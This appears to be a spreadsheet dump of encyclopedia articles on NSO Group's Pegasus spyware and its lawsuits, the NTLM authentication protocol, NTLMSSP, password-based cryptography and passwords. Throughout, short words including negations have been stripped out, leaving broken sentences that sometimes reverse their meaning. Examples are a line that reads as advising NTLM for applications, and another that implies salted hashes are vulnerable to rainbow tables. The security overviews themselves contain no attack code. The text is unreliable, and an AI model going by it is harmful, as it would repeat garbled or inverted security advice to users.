2020, appended public registry documents indicated company's bulgarian office grown employ people received loans worth million american dollars 2017 offshore companies swiss bank registered cayman islands. history 2012, federal government mexico announced signing million contract nso. later revealed york times investigation nso's product used target journalists human rights activists country.nso pitched spyware drug enforcement administration (dea), declined purchase high cost.in 2015, company sold surveillance technology government panama. contract later became subject panamanian anti-corruption investigation following disclosure leak confidential information italian firm hacking team.in august 2016, (through u.s. subsidiary westbridge) pitched u.s. version pegasus diego police department (sdpd) marketing material, westbridge emphasized company u.s. based majority owned u.s. parent company. sdpd sergeant responded sales pitch "sounds awesome". sdpd declined purchase spyware expensive.around 2016, reportedly sold pegasus software ghana.in june 2018, israeli court indicted former employee allegedly stealing copy pegasus attempting sell online million worth cryptocurrency.in august 2018, human rights group amnesty international accused helping saudi arabia member organization's staff.in april 2019, froze deals saudi arabia scandal alleging software's role tracking murdered journalist jamal khashoggi months death.in 2019, messaging service whatsapp alleged spyware injection exploit targeting calling feature developed nso. whatsapp stated exploit targeted 1,400 users countries, including least human-rights defenders, journalists members civil society". denied involvement selecting targeting victims, explicitly deny creating exploit. response alleged cyberattack, whatsapp sued nso.in june 2019, began setting test facility jersey procured nso's services, began testing version pegasus developed u.s. government agencies used u.s. phones. after years deliberations department justice, decided deploy tools domestic summer 2021, jersey facility laying dormant early 2022. dea, secret service, united states africa command also held discussions however proceed beyond stage.in april 2020, motherboard reported incident occurred several years prior employee used client's pegasus tool love interest female personal acquaintance) work trip uae. employee broke client's office outside office hours tool, prompted alert investigation client. employee detained authorities, fired nso, motherboard's sources said. sources also told motherboard leadership held meeting prevent similar incidents future, subsequently adopted rigorous screening employees interact clients.in july 2020, motherboard reported branch pitching brand pegasus secret service 2018.in november 2021, united states added group entity list, acting "contrary foreign policy national security interests effectively bans sale hardware software company. listing deprived u.s. technology relies, crippling operations. israeli officials subsequently unsuccessfully attempted blacklisting overturned, reportedly tried failed multiple times meet u.s. bureau industry security attempt obtain export waivers.in december 2021, human rights organisations sent joint letter calling impose global sanctions group seek "prohibit sale, transfer, export import israeli company’s surveillance technology" risks nso's technology poses human rights globally.in january 2022, calcalist published investigatory piece detailing widespread unlawful pegasus israeli police. although israeli police formally denied this, senior police officials hinted claims true. february police admitted was, fact, misuse software. february second calcalist report revealed warrantless surveillance widespread, including politicians government officials, heads corporations, journalists, activists, even avner netanyahu, then-prime minister, benjamin netanyahu. after outcry calls state commission inquiry, including current police commissioner himself, minister public security (the minister responsible police), omer bar-lev, announced forming commission inquiry, chaired retired judge, whose powers basically indistinguishable state commission. products services pegasus groups offers smartphone spyware tool pegasus government clients exclusive intended purpose combating crime terrorism. first version pegasus finalised 2011. pegasus spyware classified weapon israel export technology must approved government. israeli ministry defense licenses export pegasus foreign governments, private entities.pegasus compatible iphone android devices. deployed remotely. once deployed, allows client access target phone's data sensors, including: location data, texts, emails, social media messages, files, camera, microphone. client-facing side tool user friendly, required (depending upon case) client begin deployment pegasus enter target's phone number tool. phantom phantom phone hacking product marketed westbridge, united states branch group. according former employee, "phantom" brand name pegasus u.s., tools otherwise identical. israel required group program pegasus able target phone numbers. launched phantom u.s. market u.s. targets, receiving permission israel develop specialty tool exclusive u.s. governmental agencies. circles 2014, surveillance firm circles acquired francisco partners, becoming corporate affiliate group. circles' product phone geolocation tool. firm systems. operates connecting purchasing country's local telecommunications companies’ infrastructure. separate system, known “circles cloud”, capable interconnecting telecommunications companies across globe.in december 2020, citizen reported supreme council national security (scns) united arab emirates receive systems. lawsuit filed group israel, email exchanges revealed links circles several customers united arab emirates. documents also revealed circles sent targets’ locations phone records scns. aside israel uae, report named governments australia, belgium, botswana, chile, denmark, ecuador, salvador, estonia, equatorial guinea, guatemala, honduras, indonesia, kenya, malaysia, mexico, morocco, nigeria, peru, serbia, vietnam, zambia, zimbabwe likely customers circles surveillance technology.in september 2021, forensic news published shipping records showing 2020 circles supplied equipment uzbekistan's state security service (sgb). criticism controversies undercover private investigators pursue critics october 2018, associated press reported citizen researchers pursued undercover operatives false identities. undercover agents inquiring work involving group, also appeared trying goad researchers making anti-semitic otherwise damaging remarks. after growing suspicious, researcher contacted reporters. together, managed arrange sting meeting suspected undercover operative hotel luncheon journalists secretly awaiting nearby; journalists approached operative question him, operative fled, bumping chairs circling room tried away. there also appeared additional undercover operatives room. operative researcher appeared filming researcher hidden camera meeting, operatives standing nearby appeared recording meeting well. operative later identified former israeli security official. responding report, denied involvement. later also uncovered identified undercover agent previously worked case linked israeli private intelligence agency black cube; group subsequently denied contracting black cube, black cube denied involvement well.in february 2019, associated press reported least four individuals three lawyers involved lawsuits group alleged sales spyware governments poor human rights records, journalist covering said litigation pursued undercover operatives work nso. undercover agents tried goad individuals making racist anti-israel remarks. individuals surreptitiously recorded undercover operatives. channel israeli television channel, obtained aired secret recordings made undercover operatives shortly published revelations. channel claimed individuals attempting smear group behalf qatar. channel also confirmed black cube undercover investigators involved. whatsapp lawsuit 2019, messaging service whatsapp alleged spyware injection exploit targeting calling feature developed nso. victims exposed spyware payload even answer call. whatsapp told financial times "the attack hallmarks private company known work governments deliver spyware reportedly takes functions mobile phone operating systems." denied involvement selecting targeting victims, explicitly deny creating exploit. response alleged cyberattack, whatsapp sued cfaa laws francisco court october whatsapp stated exploit targeted 1,400 users countries, including least human-rights defenders, journalists members civil society". whatsapp alerted 1,400 targeted users. least case, surveillance authorized judge.nso employees complained whatsapp improved security, according court filings whatsapp parent company facebook: 2019, facebook publicly announced investigated identified vulnerability involving whatsapp service (cve-2019-3568). whatsapp facebook closed vulnerability, contacted enforcement, advised users update whatsapp app. defendants subsequently complained whatsapp closed vulnerability. specifically, employee stated, "you closed biggest remote cellular it's news world." april 2020, group blamed government clients hacking 1,400 whatsapp users, including journalists human rights activists. however, firm disclose names clients which, citizen stated, include authorities saudi arabia, uae, bahrain, kazakhstan, morocco, mexico. court filings whatsapp alleged investigation showed hacks originated group servers rather clients'. whatsapp said "nso used network computers monitor update pegasus implanted users' devices. these nso-controlled computers served nerve centre controlled customers' operation pegasus." whatsapp said gained "unauthorised access" whatsapp servers reverse-engineering whatsapp able evade security features. responded "nso group operate pegasus software clients". apple lawsuit november 2021, apple inc. filed complaint group parent company cyber technologies united states district court northern district california relation forcedentry exploit used deploy pegasus spyware package, requesting injunctive relief, compensatory damages, punitive damages, disgorgement profits. "zero-click" exploit discovered canadian citizen saudi activist loujain al-hathloul's iphone hacked. technical information uncovered bill marczak's team allowed apple warn thousands users, including u.s. state department employees uganda. researchers also discovered spyware quadream, another israeli vendor, took advantage vulnerability iphones. also darkmatter (emirati company) israeli technology quadream group whatsapp snooping scandal references external links official website</t>
  </si>
  <si>
    <t>NT LAN Manager</t>
  </si>
  <si>
    <t>windows network, (new technology) manager (ntlm) suite microsoft security protocols intended provide authentication, integrity, confidentiality users. ntlm successor authentication protocol microsoft manager (lanman), older microsoft product. ntlm protocol suite implemented security support provider, combines manager authentication protocol, ntlmv1, ntlmv2 ntlm2 session protocols single package. whether protocols used used system governed group policy settings, different versions windows different default settings. ntlm passwords considered weak brute-forced easily modern hardware. protocol ntlm challenge–response authentication protocol uses three messages authenticate client connection-oriented environment (connectionless similar), fourth additional message integrity desired. first, client establishes network path server sends negotiate_message advertising capabilities. next, server responds challenge_message used establish identity client. finally, client responds challenge authenticate_message.the ntlm protocol uses hashed password values, also stored server domain controller), lack salting password equivalent, meaning grab hash value server, authenticate without knowing actual password. hash des-based function applied first characters password converted traditional 8-bit charset language), hash (md4 little endian utf-16 unicode password). both hash values bytes (128 bits) each.the ntlm protocol also uses one-way functions, depending ntlm version; lanman ntlm version des-based lanman one-way function (lmowf), ntlmv2 uses based one-way function (ntowf). ntlmv1 server authenticates client sending 8-byte random number, challenge. client performs operation involving challenge secret shared client server, specifically password hashes described above. client returns 24-byte result computation. fact, ntlmv1 computations usually made using hashes 24-byte results sent. server verifies client computed correct result, infers possession secret, hence authenticity client. both hashes produce 16-byte quantities. five bytes zeros appended obtain bytes. bytes separated three 7-byte (56-bit) quantities. each 56-bit quantities used encrypt 64-bit challenge. three encryptions challenge reunited form 24-byte response. both response using hash hash returned response, configurable. 8-byte server challenge, random ntlm-hash 5-bytes-0 response des(k1,c) des(k2,c) des(k3,c) ntlmv2 ntlmv2, introduced windows (and natively supported windows 2000), challenge-response authentication protocol. intended cryptographically strengthened replacement ntlmv1, enhancing ntlm security hardening protocol many spoofing attacks adding ability server authenticate client.ntlmv2 sends responses 8-byte server challenge. each response contains 16-byte hmac-md5 hash server challenge, fully/partially randomly generated client challenge, hmac-md5 hash user's password identifying information. responses differ format client challenge. shorter response uses 8-byte random value challenge. order verify response, server must receive part response client challenge. shorter response, 8-byte client challenge appended 16-byte response makes 24-byte package consistent 24-byte response format previous ntlmv1 protocol. certain non-official documentation (e.g. dce/rpc over smb, leighton) response termed lmv2. second response sent ntlmv2 uses variable-length client challenge includes current time time format, 8-byte random value (cc2 below), domain name standard format stuff. response must include copy client challenge, therefore variable length. non-official documentation, response termed ntv2. both lmv2 ntv2 hash client server challenge hash user's password identifying information. exact formula begin hash, stored continue hash using hmac-md5, username domain name. below, stands fixed contents formatting field. 8-byte server challenge, random 8-byte client challenge, random time, cc2, domain name) v2-hash hmac-md5(nt-hash, user name, domain name) lmv2 hmac-md5(v2-hash, ntv2 hmac-md5(v2-hash, cc*) response lmv2 ntv2 ntlm2 session ntlm2 session protocol similar ms-chapv2. consists authentication ntlmv1 combined session security ntlmv2. briefly, ntlmv1 algorithm applied, except 8-byte client challenge appended 8-byte server challenge md5-hashed. least 8-byte half hash result challenge utilized ntlmv1 protocol. client challenge returned 24-byte slot response message, 24-byte calculated response returned slot. this strengthened form ntlmv1 maintains ability existing domain controller infrastructure avoids dictionary attack rogue server. fixed server computes table location value y=des_k(x). without client participating choice challenge, server send look response table this attack made practical using rainbow tables.however, existing ntlmv1 infrastructure allows challenge/response pair verified server, sent domain controller verification. using ntlm2 session, infrastructure continues work server substitutes challenge hash server client challenges. ntlmv1 client&lt;-server: client-&gt;server: h(p,sc) server-&gt;domcntl: h(p,sc), server&lt;-domcntl: ntlm2 session client&lt;-server: client-&gt;server: h(p,h'(sc,cc)), server-&gt;domcntl: h(p,h'(sc,cc)), h'(sc,cc) server&lt;-domcntl: availability ntlm since 2010, microsoft longer recommends ntlm applications: implementers aware ntlm support recent cryptographic methods, sha-256. uses cyclic redundancy checks (crc) integrity, encryption. deriving password specified rfc1320 fips46-2. therefore, applications generally advised ntlm. despite recommendations, ntlm still widely deployed systems. major reason maintain compatibility older systems. however, avoided circumstances.microsoft added ntlm hash implementation kerberos protocol improve interoperability particular, rc4-hmac encryption type). according independent researcher, design decision allows domain controllers tricked issuing attacker kerberos ticket ntlm hash known. microsoft adopted kerberos preferred authentication protocol windows 2000 subsequent active directory domains. kerberos typically used server belongs windows server domain. microsoft recommends developers neither kerberos ntlm security support provider (ssp) directly. your application access ntlm security package directly; instead, negotiate security package. negotiate allows application take advantage advanced security protocols supported systems involved authentication. currently, negotiate security package selects kerberos ntlm. negotiate selects kerberos unless cannot used systems involved authentication. ntlm security support provider ntlm used following situations: client authenticating server belong domain active directory domain exists (commonly referred "workgroup" "peer-to-peer") server must "password-protected sharing" feature enabled, enabled default mutually exclusive homegroup versions windows. when server client belong homegroup, protocol similar kerberos, public cryptography based user user authentication used instead ntlm. homegroup probably easiest share resources small network, requiring minimal setup, even compared configuring additional users able password-protected sharing, mean used much password-protected sharing small networks home networks. server device supports smb, devices network printers, ntlm offer supported authentication method. some implementations older distributions e.g. samba cause windows negotiate ntlmv1 even outbound authentication server, allowing device work although loaded outdated, insecure software regardless whether device. server member domain kerberos cannot used. client authenticating server using address (and reverse name resolution available) client authenticating server belongs different active directory forest legacy ntlm trust instead transitive inter-forest trust where firewall would otherwise restrict ports required kerberos (typically protocol versions after decided either application developer negotiate ntlm used authentication, group policy dictates ability protocols ntlm implements. there five authentication levels. send ntlm responses: clients ntlm authentication, never ntlmv2 session security; accept ntlm, ntlmv2 authentication. send ntlm ntlmv2 session security negotiated: clients ntlm authentication, ntlmv2 session security server supports accept ntlm, ntlmv2 authentication. send ntlm response only: clients ntlm authentication only, ntlmv2 session security server supports accept ntlm, ntlmv2 authentication. send ntlmv2 response only: clients ntlmv2 authentication only, ntlmv2 session security server supports accept ntlm, ntlmv2 authentication. send ntlmv2 response only\refuse clients ntlmv2 authentication only, ntlmv2 session security server supports refuse (accept ntlm ntlmv2 authentication). send ntlmv2 response only\refuse ntlm: clients ntlmv2 authentication only, ntlmv2 session security server supports refuse ntlm (accept ntlmv2 authentication).dc would mean domain controller, term confusing. computer acting server authenticating user fulfills role context, example windows computer local account administrator account used network logon. prior windows service pack would negotiate ntlmv1 fall back machine support starting windows service pack would negotiate ntlmv2 session whenever client server would support including windows used either 56-bit encryption non-u.s. computers, since united states severe restrictions export encryption technology time. starting windows sp3, 128-bit encryption could added installing update windows 128-bit encryption would default. windows vista above, disabled inbound authentication. windows nt-based operating systems including windows server 2003 store password hashes, manager (lm) hash windows hash. starting windows vista, capability store there, turned default. this means authentication longer works computer running windows vista acts server. prior versions windows (back windows service pack could configured behave way, default. weakness vulnerabilities ntlm remains vulnerable pass hash attack, variant reflection attack addressed microsoft security update ms08-068. example, metasploit used many cases obtain credentials machine used gain control another machine. squirtle toolkit used leverage site cross-site scripting attacks attacks nearby assets ntlm.in february 2010, amplia security discovered several flaws windows implementation ntlm authentication mechanism broke security protocol allowing attackers gain read/write access files remote code execution. attacks presented included ability predict pseudo-random numbers challenges/responses generated protocol. these flaws present versions windows years. security advisory explaining issues included fully working proof-of-concept exploits. flaws fixed ms10-012.in 2012, demonstrated every possible 8-character ntlm password hash permutation cracked hours.in 2019, time reduced roughly hours using modern hardware. also, rainbow tables available eight- nine-character ntlm passwords. shorter passwords recovered brute force methods.note password-equivalent hashes used pass-the-hash attacks password cracking must first "stolen" (such compromising system permissions sufficient access hashes). also, hashes ntlmssp_auth "hash" transmitted network conventional ntlm authentication. compatibility linux ntlm implementations linux include cntlm winbind (part samba) allow linux applications ntlm proxies. freebsd also supports storing passwords crypt insecure nt-hash form. also manager ntlmssp integrated windows authentication kerberos references external links online ntlm hash crack using rainbow tables manager (ntlm) authentication protocol specification cntlm ntlm, ntlmsr, ntlmv2 authentication proxy accelerator personal http(s) socks5 proxy ntlm-unaware applications (windows/linux/unix) ntlm authentication protocol security support provider detailed analysis ntlm protocol. msdn article explaining protocol renamed msdn page ntlm authentication libntlm free implementation. ntlm authorization proxy server software allows users authenticate proxy server. installing ntlm authentication ntlm set-up instructions samba midgard linux ntlm version (ntlmv2) lmcompatibilitylevel setting governs jespa java active directory integration full ntlm security service provider server-side netlogon validation (commercial free users) easysso ntml authenticator jira ntlm authenticator utilising jespa library provide atlassian products. ntlmv2-auth ntlmv2 servlet filter java ntlm message generator tool waffle java/c# windows authentication framework objectif-securite (rainbow tables ophcrack) windows http proxy server automatically authenticate ntlm proxy</t>
  </si>
  <si>
    <t>NTLMSSP</t>
  </si>
  <si>
    <t>ntlmssp manager (ntlm) security support provider) binary messaging protocol used microsoft security support provider interface (sspi) facilitate ntlm challenge-response authentication negotiate integrity confidentiality options. ntlmssp used wherever sspi authentication used including server message block cifs extended security authentication, http negotiate authentication (e.g. turned msrpc services. ntlmssp ntlm challenge-response protocol documented microsoft's open protocol specification. references</t>
  </si>
  <si>
    <t>Password-based cryptography</t>
  </si>
  <si>
    <t>password-based cryptography generally refers distinct classes methods: single-party methods multi-party methods single party methods some systems attempt derive cryptographic directly password. however, practice generally ill-advised threat brute-force attack. techniques mitigate attack include passphrases iterated (deliberately slow) password-based derivation functions pbkdf2 (rfc 2898). multi-party methods password-authenticated agreement systems allow parties agree password password-related data) derive shared keys without exposing password keys network attack. earlier generations challenge–response authentication systems also used passwords, generally subject eavesdropping and/or brute-force attacks password. also password passphrase password-authenticated agreement</t>
  </si>
  <si>
    <t>Password</t>
  </si>
  <si>
    <t>password, sometimes called passcode (for example apple devices), secret data, typically string characters, usually used confirm user's identity. traditionally, passwords expected memorized, large number password-protected services typical individual accesses make memorization unique passwords service impractical. using terminology nist digital identity guidelines, secret held party called claimant party verifying identity claimant called verifier. when claimant successfully demonstrates knowledge password verifier established authentication protocol, verifier able infer claimant's identity. general, password arbitrary string characters including letters, digits, symbols. permissible characters constrained numeric, corresponding secret sometimes called personal identification number (pin). despite name, password need actual word; indeed, non-word dictionary sense) harder guess, desirable property passwords. memorized secret consisting sequence words text separated spaces sometimes called passphrase. passphrase similar password usage, former generally longer added security. history passwords used since ancient times. sentries would challenge wishing enter area supply password watchword, would allow person group pass knew password. polybius describes system distribution watchwords roman military follows: secure passing round watchword night follows: tenth maniple class infantry cavalry, maniple encamped lower street, chosen relieved guard duty, attends every sunset tent tribune, receiving watchword—that wooden tablet word inscribed takes leave, returning quarters passes watchword tablet witnesses commander next maniple, turn passes next him. reaches first maniples, encamped near tents tribunes. these latter obliged deliver tablet tribunes dark. issued returned, tribune knows watchword given maniples, passed back him. missing, makes inquiry once, knows marks quarter tablet returned, whoever responsible stoppage meets punishment merits. passwords military evolved include password, password counterpassword; example opening days battle normandy, paratroopers u.s. 101st airborne division used password—flash—which presented challenge, answered correct response—thunder. challenge response changed every three days. american paratroopers also famously used device known "cricket" d-day place password system temporarily unique method identification; metallic click given device lieu password clicks reply.passwords used computers since earliest days computing. compatible time-sharing system (ctss), operating system introduced 1961, first computer system implement password login. ctss login command requested user password. "after typing password, system turns printing mechanism, possible, user type password privacy." early 1970s, robert morris developed system storing login passwords hashed form part unix operating system. system based simulated hagelin rotor crypto machine, first appeared edition unix 1974. later version algorithm, known crypt(3), used 12-bit salt invoked modified form algorithm times reduce risk pre-computed dictionary attacks.in modern times, user names passwords commonly used people process controls access protected computer operating systems, mobile phones, cable decoders, automated teller machines (atms), etc. typical computer user passwords many purposes: logging accounts, retrieving e-mail, accessing applications, databases, networks, sites, even reading morning newspaper online. choosing secure memorable password easier password owner remember generally means easier attacker guess. however, passwords difficult remember also reduce security system users might need write electronically store password, users need frequent password resets users likely re-use password across different accounts. similarly, stringent password requirements, "have uppercase lowercase letters digits" "change monthly", greater degree users subvert system. others argue longer passwords provide security (e.g., entropy) shorter passwords wide variety characters.in memorability security passwords, jeff examine effect advice given users good choice password. they found passwords based thinking phrase taking first letter word memorable naively selected passwords, hard crack randomly generated passwords. combining unrelated words altering letters special characters numbers another good method, single dictionary word not. having personally designed algorithm generating obscure passwords another good method.however, asking users remember password consisting "mix uppercase lowercase characters" similar asking remember sequence bits: hard remember, little harder crack (e.g. times harder crack 7-letter passwords, less user simply capitalises letters). asking users "both letters digits" often lead easy-to-guess substitutions '1', substitutions well known attackers. similarly typing password keyboard higher common trick known attackers.in 2013, google released list common password types, considered insecure easy guess (especially researching individual social media): name pet, child, family member, significant anniversary dates birthdays birthplace name favorite holiday something related favorite sports team word "password" alternatives memorization traditional advice memorize passwords never write become challenge sheer number passwords users computers internet expected maintain. survey concluded average user around passwords. manage proliferation passwords, users employ password multiple accounts, dangerous practice since data breach account could compromise rest. less risky alternatives include password managers, single sign-on systems simply keeping paper lists less critical passwords. such practices reduce number passwords must memorized, password manager's master password, manageable number. factors security password system security password-protected system depends several factors. overall system must designed sound security, protection computer viruses, man-in-the-middle attacks like. physical security issues also concern, deterring shoulder surfing sophisticated physical threats video cameras keyboard sniffers. passwords chosen hard attacker guess hard attacker discover using available automatic attack schemes. password strength computer security information.nowadays, common practice computer systems hide passwords typed. purpose measure prevent bystanders reading password; however, argue practice lead mistakes stress, encouraging users choose weak passwords. alternative, users option show hide passwords type them.effective access control provisions force extreme measures criminals seeking acquire password biometric token. less extreme measures include extortion, rubber hose cryptanalysis, side channel attack. some specific password management issues must considered thinking about, choosing, handling, password follow. rate attacker guessed passwords rate attacker submit guessed passwords system factor determining system security. some systems impose time-out several seconds small number (e.g., three) failed password entry attempts, also known throttling. 5.2.2 absence vulnerabilities, systems effectively secure relatively simple passwords well chosen easily guessed.many systems store cryptographic hash password. attacker gets access file hashed passwords guessing done offline, rapidly testing candidate passwords true password's hash value. example web-server, online attacker guess rate server respond, off-line attacker (who gains access file) guess rate limited hardware attack running. passwords used generate cryptographic keys (e.g., disk encryption wi-fi security) also subjected high rate guessing. lists common passwords widely available make password attacks efficient. (see password cracking.) security situations depends using passwords passphrases adequate complexity, making attack computationally infeasible attacker. some systems, wi-fi wpa, apply computation-intensive hash password slow attacks. stretching. limits number password guesses alternative limiting rate attacker make guesses password limit total number guesses made. password disabled, requiring reset, small number consecutive guesses (say user required change password larger cumulative number guesses (say 30), prevent attacker making arbitrarily large number guesses interspersing good guesses made legitimate password owner. attackers conversely knowledge mitigation implement denial service attack user intentionally locking user device; denial service open avenues attacker manipulate situation advantage social engineering. form stored passwords some computer systems store user passwords plaintext, compare user logon attempts. attacker gains access internal password store, passwords—and user accounts—will compromised. users employ password accounts different systems, compromised well. more secure systems store password cryptographically protected form, access actual password still difficult snooper gains internal access system, validation user access attempts remains possible. secure store passwords all, one-way derivation, polynomial, modulus, advanced hash function. roger needham invented now-common approach storing "hashed" form plaintext password. when user types password system, password handling software runs cryptographic hash algorithm, hash value generated user's entry matches hash stored password database, user permitted access. hash value created applying cryptographic hash function string consisting submitted password and, many implementations, another value known salt. salt prevents attackers easily building list hash values common passwords prevents password cracking efforts scaling across users. sha1 frequently used cryptographic hash functions, recommended password hashing unless used part larger construction pbkdf2.the stored data—sometimes called "password verifier" "password hash"—is often stored modular crypt format 2307 hash format, sometimes /etc/passwd file /etc/shadow file.the main storage methods passwords plain text, hashed, hashed salted, reversibly encrypted. attacker gains access password file, stored plain text, cracking necessary. hashed salted vulnerable rainbow table attacks (which efficient cracking). reversibly encrypted attacker gets decryption along file cracking necessary, fails cracking possible. thus, common storage formats passwords passwords salted hashed cracking necessary possible.if cryptographic hash function well designed, computationally infeasible reverse function recover plaintext password. attacker can, however, widely available tools attempt guess passwords. these tools work hashing possible passwords comparing result guess actual password hashes. attacker finds match, know guess actual password associated user. password cracking tools operate brute force (i.e. trying every possible combination characters) hashing every word list; large lists possible passwords many languages widely available internet. existence password cracking tools allows attackers easily recover poorly chosen passwords. particular, attackers quickly recover passwords short, dictionary words, simple variations dictionary words, easily guessable patterns. modified version algorithm used basis password hashing algorithm early unix systems. crypt algorithm used 12-bit salt value user's hash unique iterated algorithm times order make hash function slower, measures intended frustrate automated guessing attacks. user's password used encrypt fixed value. more recent unix unix-like systems (e.g., linux various systems) secure password hashing algorithms pbkdf2, bcrypt, scrypt, large salts adjustable cost number iterations. poorly designed hash function make attacks feasible even strong password chosen. hash widely deployed insecure example. methods verifying password network simple transmission password passwords vulnerable interception (i.e., "snooping") transmitted authenticating machine person. password carried electrical signals unsecured physical wiring user access point central system controlling password database, subject snooping wiretapping methods. carried packeted data internet, anyone able watch packets containing logon information snoop probability detection. email sometimes used distribute passwords generally insecure method. since email sent plaintext, message containing password readable without effort transport eavesdropper. further, message stored plaintext least computers: sender's recipient's. passes intermediate systems travels, probably stored well, least time, copied backup, cache history files systems. using client-side encryption protect transmission mail handling system server client machine. previous subsequent relays email protected email probably stored multiple computers, certainly originating receiving computers, often clear text. transmission encrypted channels risk interception passwords sent internet reduced among approaches, using cryptographic protection. widely used transport layer security (tls, previously called ssl) feature built current internet browsers. most browsers alert user tls/ssl-protected exchange server displaying closed lock icon, sign, use. there several techniques use; cryptography. hash-based challenge–response methods unfortunately, conflict stored hashed-passwords hash-based challenge–response authentication; latter requires client prove server know shared secret (i.e., password) this, server must able obtain shared secret stored form. many systems (including unix-type systems) remote authentication, shared secret usually becomes hashed form serious limitation exposing passwords offline guessing attacks. addition, hash used shared secret, attacker need original password authenticate remotely; need hash. zero-knowledge password proofs rather transmitting password, transmitting hash password, password-authenticated agreement systems perform zero-knowledge password proof, proves knowledge password without exposing moving step further, augmented systems password-authenticated agreement (e.g., amp, b-speke, pak-z, srp-6) avoid conflict limitation hash-based methods. augmented system allows client prove knowledge password server, server knows (not exactly) hashed password, un-hashed password required gain access. procedures changing passwords usually, system must provide change password, either user believes current password might been) compromised, precautionary measure. password passed system unencrypted form, security lost (e.g., wiretapping) password even installed password database password given compromised employee, little gained. some websites include user-selected password unencrypted confirmation e-mail message, obvious increased vulnerability. identity management systems increasingly used automate issuance replacements lost passwords, feature called self-service password reset. user's identity verified asking questions comparing answers ones previously stored (i.e., account opened). some password reset questions personal information could found social media, mother's maiden name. result, security experts recommend either making one's questions giving false answers. password longevity "password aging" feature operating systems forces users change passwords frequently (e.g., quarterly, monthly even often). such policies usually provoke user protest foot-dragging best hostility worst. there often increase number people note password leave easily found, well help desk calls reset forgotten password. users simpler passwords develop variation patterns consistent theme keep passwords memorable. because issues, debate whether password aging effective. changing password prevent abuse cases, since abuse would often immediately noticeable. however, someone access password means, sharing computer breaching different site, changing password limits window abuse. number users password allotting separate passwords user system preferable single password shared legitimate users system, certainly security viewpoint. this partly users willing tell another person (who authorized) shared password exclusively use. single passwords also much less convenient change many people need told time, make removal particular user's access difficult, instance graduation resignation. separate logins also often used accountability, example know changed piece data. password security architecture common techniques used improve security computer systems protected password include: displaying password display screen entered obscuring typed using asterisks bullets (•). allowing passwords adequate length. (some legacy operating systems, including early versions unix windows, limited passwords character maximum, reducing security.) requiring users re-enter password period inactivity semi log-off policy). enforcing password policy increase password strength security. assigning randomly chosen passwords. requiring minimum password lengths. some systems require characters various character classes password—for example, "must least uppercase least lowercase letter". however, all-lowercase passwords secure keystroke mixed capitalization passwords. employ password blacklist block weak, easily guessed passwords providing alternative keyboard entry (e.g., spoken passwords, biometric identifiers). requiring authentication system, two-factor authentication (something user something user knows). using encrypted tunnels password-authenticated agreement prevent access transmitted passwords network attacks limiting number allowed failures within given time period prevent repeated password guessing). after limit reached, attempts fail (including correct password attempts) beginning next time period. however, vulnerable form denial service attack. introducing delay password submission attempts slow automated password guessing programs.some stringent policy enforcement measures pose risk alienating users, possibly decreasing security result. password reuse common practice amongst computer users reuse password multiple sites. this presents substantial security risk, attacker needs compromise single site order gain access sites victim uses. this problem exacerbated also reusing usernames, websites requiring email logins, makes easier attacker track single user across multiple sites. password reuse avoided minimized using mnemonic techniques, writing passwords paper, using password manager.it argued redmond researchers dinei florencio cormac herley, together paul oorschot carleton university, canada, password reuse inevitable, users reuse passwords low-security websites (which contain little personal data financial information, example) instead focus efforts remembering long, complex passwords important accounts, bank accounts. similar arguments made forbes change passwords often many "experts" advise, limitations human memory. writing passwords paper historically, many security experts asked people memorize passwords: "never write password". more recently, many security experts bruce schneier recommend people passwords complicated memorize, write paper, keep wallet.password manager software also store passwords relatively safely, encrypted file sealed single master password. after death according survey university london, people leaving passwords wills pass important information die. one-third people, according poll, agree password-protected data important enough pass will. multi-factor authentication multi-factor authentication schemes combine passwords "knowledge factors") means authentication, make authentication secure less vulnerable compromised passwords. example, simple two-factor login might send text message, e-mail, automated phone call, similar alert whenever login attempt made, possibly supplying code must entered addition password. more sophisticated factors include things hardware tokens biometric security. password rules most organizations specify password policy sets requirements composition usage passwords, typically dictating minimum length, required categories (e.g., upper lower case, numbers, special characters), prohibited elements (e.g., one's name, date birth, address, telephone number). some governments national authentication frameworks define requirements user authentication government services, including requirements passwords. many websites enforce standard rules minimum maximum length, also frequently include composition rules featuring least capital letter least number/symbol. these latter, specific rules largely based 2003 report national institute standards technology (nist), authored bill burr. originally proposed practice using numbers, obscure characters capital letters updating regularly. 2017 wall street journal article, burr reported regrets proposals made mistake recommended them.according 2017 rewrite nist report, many websites rules actually opposite effect security users. this includes complex composition rules well forced password changes certain periods time. while rules long widespread, also long seen annoying ineffective users cyber-security experts. nist recommends people longer phrases passwords (and advises websites raise maximum password length) instead hard-to-remember passwords "illusory complexity" "pa55w+rd". user prevented using password "password" simply choose "password1" required include number uppercase letter. combined forced periodic password changes, lead passwords difficult remember easy crack.paul grassi, 2017 nist report's authors, elaborated: "everyone knows exclamation point last character password. well-known tricks, aren’t fooling adversary. simply fooling database stores passwords thinking user something good."pieris tsokkis eliana stavrou able identify password construction strategies research development password generator tool. they came eight categories password construction strategies based exposed password lists, password cracking tools, online reports citing used passwords. these categories include user-related information, keyboard combinations patterns, placement strategy, word processing, substitution, capitalization, append dates, combination previous categories password cracking attempting crack passwords trying many possibilities time money permit brute force attack. related method, rather efficient cases, dictionary attack. dictionary attack, words dictionaries tested. lists common passwords also typically tested. password strength likelihood password cannot guessed discovered, varies attack algorithm used. cryptologists computer scientists often refer strength 'hardness' terms entropy.passwords easily discovered termed weak vulnerable; passwords difficult impossible discover considered strong. there several programs available password attack even auditing recovery systems personnel) l0phtcrack, john ripper, cain; password design vulnerabilities found microsoft lanmanager system) increase efficiency. these programs sometimes used system administrators detect weak passwords proposed users. studies production computer systems consistently shown large fraction user-chosen passwords readily guessed automatically. example, columbia university found user passwords could recovered little effort. according bruce schneier, examining data 2006 phishing attack, myspace passwords would crackable hours using commercially available password recovery toolkit capable testing 200,000 passwords second 2006. also reported single common password password1, confirming general lack informed care choosing passwords among users. nevertheless maintained, based data, general quality passwords improved years—for example, average length eight characters seven previous surveys, less dictionary words.) incidents july 1998, cert reported incident attacker found 186,126 encrypted passwords. time attacker discovered, 47,642 passwords already cracked. september 2001, deaths york employees september attacks, financial services firm cantor fitzgerald microsoft broke passwords deceased employees gain access files needed servicing client accounts. technicians used brute-force attacks, interviewers contacted families gather personalized information might reduce search time weaker passwords. december 2009, major password breach rockyou.com website occurred release million passwords. hacker leaked full list million passwords (with identifiable information) internet. passwords stored cleartext database extracted injection vulnerability. imperva application defense center (adc) analysis strength passwords. june 2011, nato (north atlantic treaty organization) experienced security breach public release first last names, usernames, passwords 11,000 registered users e-bookshop. data leaked part operation antisec, movement includes anonymous, lulzsec, well hacking groups individuals. antisec expose personal, sensitive, restricted information world, 